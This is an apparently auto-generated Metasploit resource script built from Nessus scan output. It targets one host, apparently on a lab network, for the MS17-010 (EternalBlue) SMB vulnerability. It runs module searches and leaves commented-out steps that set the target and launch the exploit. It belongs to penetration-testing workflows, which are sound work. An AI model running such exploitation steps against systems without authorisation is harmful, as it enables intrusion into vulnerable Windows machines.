# Metasploit Resource Script for Exploit Framework Vulnerabilities
# Generated from Nessus raw scan data
# Total vulnerabilities with Metasploit exploits: 1
# Target hosts: 10.129.175.161
# Associated CVEs: 

# Set global options
setg VERBOSE true

# HIGH - MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
# Host: 10.129.175.161 | Plugin ID: 97833
# CVSS Score: 9.3

# Specific Metasploit Exploit: SMB DOUBLEPULSAR Remote Code Execution
search SMB DOUBLEPULSAR Remote

search MS17-010: Security Update
# Review search results and select appropriate module
# search type:exploit
# use <module_path>
# set RHOSTS 10.129.175.161
# set LHOST <your_ip>
# exploit
